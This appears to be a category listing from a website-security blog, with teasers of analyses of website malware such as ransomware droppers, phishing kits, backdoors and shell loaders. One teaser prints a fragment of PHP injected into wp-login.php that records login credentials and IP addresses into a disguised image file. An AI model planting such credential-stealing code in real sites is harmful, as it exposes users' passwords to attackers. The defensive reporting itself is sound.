Troldesh Ransomware Dropper
Luke Leal Over the past few weeks, we’ve seen an increase in Troldesh ransomware using compromised websites as intermediary malware distributors. The malware often uses a PHP…
Browsing Category
Website Malware Infections
837 posts
Hydro-Quebec phishing
We have found an interesting phishing kit containing numerous phishing pages which target large, popular brands like Amazon and Paypal. What was interesting about this…
User adder backdoor
Cesar Anjos As we’ve seen many times before, there are a variety of backdoors that can be planted on a website. Post-compromise, it’s almost mandatory to review…
EE wireless provider phishing malware
Krasimir Konov A large number of phishing targets include popular services such as banks, payment providers, and email services. In this type of attack, fraudsters create fake…
New variant of “trollherten” malware
We continue to see new variations of obfuscation used to hide a PHP backdoor that began to be heavily used by malicious users in late…
Self-destruct malware
The majority of malware we find on compromised websites have been planted by bad actors with the intention of concealing and accessing backdoor access. During…
Yet another variant of the cPanel user shadow editor malware
We have discovered a new variant of PHP malware used to edit a cPanel users’s shadow file, allowing for bad actors to change passwords for…
Plugins Under Attack: July 2019
John Castro A long-lasting malware campaign targeting deprecated, vulnerable versions of plugins continues to be leveraged by attackers to inject malicious scripts into affected websites: Multi-Vector Attack…
Simple but effective backdoor
We recently found a malicious PHP file containing a small amount of code that is effective at hiding from detection by various server side scanning…
Simple WP login stealer
We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time);…
“Loader for Secured Files” and arrayed b374k shell encoding
This file (33×77.php) was detected in the document root of a website during a website cleanup for a client. It demonstrates how hackers sometimes use…